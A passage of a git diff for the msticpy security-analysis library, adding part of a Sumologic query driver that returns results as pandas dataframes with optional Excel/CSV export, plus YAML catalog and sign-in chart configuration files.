+        end : datetime
+            A datetime() object representing the end of the search window.
+            If used without start_time, the search start will be the earliest
+            time in the index.
+        end_time : datetime
+            alias for `end`
+        timeZone : str
+            timezone used for time range search
+        byReceiptTime : datetime
+            if time reference should used _receiptTime (time when Sumologic
+            got message) instead of _messageTime (time present in log message).
+        limit : int
+            An integer describing the max number of search results to return.
+        forceMessagesResults : bool
+            Force results to be raw messages even if aggregated query.
+        verbosity : int
+            Provide more verbose state. from 0 least verbose to 4 most one.
+        normalize : bool
+            If set to True, fields containing structures (i.e. subfields)
+            will be flattened such that each field has it's own column in
+            the dataframe. If False, there will be a single column for the
+            structure, with a JSON string encoding all the contents.
+        exporting : bool
+            Export result to file.
+        export_path : str
+            file path for exporte results.
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            Query results in a dataframe.
+            or query response if an error.
+
+        """
+        verbosity = kwargs.get("verbosity", 0)
+        normalize = kwargs.pop("normalize", True)
+        exporting = kwargs.pop("exporting", False)
+        export_path = kwargs.pop("export_path", "")
+
+        results = self._query(query, **kwargs)
+        if verbosity >= 3:
+            print("DEBUG: {results}")
+        if normalize:
+            dataframe_res = pd.json_normalize(results)
+        else:
+            dataframe_res = pd.DataFrame(results)
+
+        for col in dataframe_res.columns:
+            if col in ("map._count", "map._timeslice"):
+                dataframe_res[col] = pd.to_numeric(dataframe_res[col])
+
+        if exporting:
+            if export_path.endswith(".xlsx"):
+                if verbosity >= 2:
+                    print(f"DEBUG: Exporting results to excel file {export_path}")
+                dataframe_res.to_excel(export_path, index=False)
+            elif export_path.endswith(".csv"):
+                if verbosity >= 2:
+                    print("DEBUG: Exporting results to csv file {export_path}")
+                dataframe_res.to_csv(export_path, index=False)
+
+        return dataframe_res
+
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            Query to execute against Sumologic instance.
+
+        Returns
+        -------
+        Union[pd.DataFrame,Any]
+            A DataFrame (if successful) or
+            the underlying provider result if an error occurs.
+
+        """
+
+    # Parameter Formatting methods
+    @staticmethod
+    def _format_datetime(date_time: datetime) -> str:
+        """Return datetime-formatted string."""
+        return date_time.strftime("%Y-%m-%dT%H:%M:%S")
+
+    # Read values from configuration
+    @staticmethod
+    def _get_config_settings(instance_name: str = None) -> Tuple[Dict[str, Any], bool]:
+        """Get config from msticpyconfig."""
+        data_provs = get_provider_settings(config_section="DataProviders")
+        sl_settings = {
+            name: settings
+            for name, settings in data_provs.items()
+            if name.startswith("Sumologic")
+        }
+        sumologic_settings: Optional[ProviderSettings]
+        # Check if the connection string is an instance name
+        sumologic_settings = sl_settings.get(f"Sumologic-{instance_name}")
+        if sumologic_settings:
+            is_instance_name = True
+        else:
+            # otherwise get the default Sumologic entry
+            sumologic_settings = sl_settings.get("Sumologic")
+            is_instance_name = False
+        return getattr(sumologic_settings, "args", {}), is_instance_name
+
+    @staticmethod
+    def _create_not_connected_err():
+        return MsticpyNotConnectedError(
+            "Please run the connect() method before running this method.",
+            title="not connected to Sumologic.",
+            help_uri=_HELP_URI,
+            notebook_uri=_SL_NB_URI,
+        )
diff --git a/msticpy/data/meta.yaml b/msticpy/data/meta.yaml
new file mode 100644
index 000000000..338f32e3e
--- /dev/null
+++ b/msticpy/data/meta.yaml
@@ -0,0 +1,21 @@
+package:
+  version: '1.0'  # update version number if data contents change
+  name: kqlsentinel
+
+build:
+  number: 0  # update build number for minor catalog fixes
+  noarch: generic
+
+requirements:
+  run:
+    - intake
+    - Kqlmagic
+    # Add additional plugins here
+  build: []
+
+about:
+  description: Kql Sentinel Driver for Log Analytics
+
+extra:
+  maintainers:
+    - Ian Hellen <ianhelle@microsoft.com>
\ No newline at end of file
diff --git a/msticpy/data/morph_charts/signin_charts.yaml b/msticpy/data/morph_charts/signin_charts.yaml
new file mode 100644
index 000000000..b33312913
--- /dev/null
+++ b/msticpy/data/morph_charts/signin_charts.yaml
@@ -0,0 +1,6 @@
+Name: SigninsChart
+Description: Charts for visualizing Azure AD Signin Logs.
+Query: Azure.list_all_signins_geo
+Tags: [azuread, signinlogs, authentication]
+DescriptionFile:
+  {'plots': [{'$type': 'HoloGraphBridge.Plots.LinearStackPlot, HoloGraphBridge', 'AxesDivisions': [0, 10, 0], 'AxesDivisionsAuto': [True, False, True], 'AxesEdgesShow': [True, True, True], 'AxesGridlinesShow': [True, True, True], 'AxesLabelsOrientation': [0, 1, 0], 'AxesLabelsShow': [True, True, True], 'AxesLabelsSize': [0.5, 0.39, 0.5], 'AxesTicksShow': [False, False, False], 'AxesTitleSize': [0.5, 0.5, 0.5], 'PositionFill': [False, False, False], 'PositionIndex': [-1, -1, -1], 'PositionRescale': [False, False, False], 'PositionReverse': [False, False, False], 'PositionScale': [1, 1, 1], 'StackBuckets': [1, 0, 1], 'StackBucketsAuto': [True, True, True], 'StackBucketsFill': [False, False, False], 'StackGroup': False, 'StackOrderAuto': True, 'StackOrderIndex': 42, 'StackOrderReverse': False, 'StackRescale': False, 'StackSpacing': [1, 1, 1], 'StackSpacingAuto': [False, False, False], 'StackSumIndex': -1, 'StackWidth': [50, 1, 1], 'StackWidthAuto': [True, False, False], 'CameraRotation': [0, 0, 0, 1], 'CameraTranslation': [0, 0, 0], 'ColorFill': False, 'ColorIndex': 42, 'Filter': -1, 'LabelColumns': [{'Index': 26, 'Name': False, 'Units': False}, {'Index': 37, 'Name': False, 'Units': False}], 'Layers': [], 'ManipulationRotation': [True, True, True], 'ManipulationScale': True, 'ManipulationTranslation': [True, True, True], 'ModelRotation': [0, -0.001181337982416153, 0, 0.9999992847442627], 'ModelScale': 4, 'ModelTranslation': [0, 0, 0], 'OrderIndex': 0, 'PaletteColors': [242, 27, 63, 255, 41, 191, 18, 255], 'PaletteDivisions': 2, 'PaletteDivisionsAuto': True, 'PaletteReverse': False, 'Selection': -1, 'Table': 0, 'TextSize': 0.5, 'TextWidth': 5, 'Thumbnail': 'data:image/png;base64,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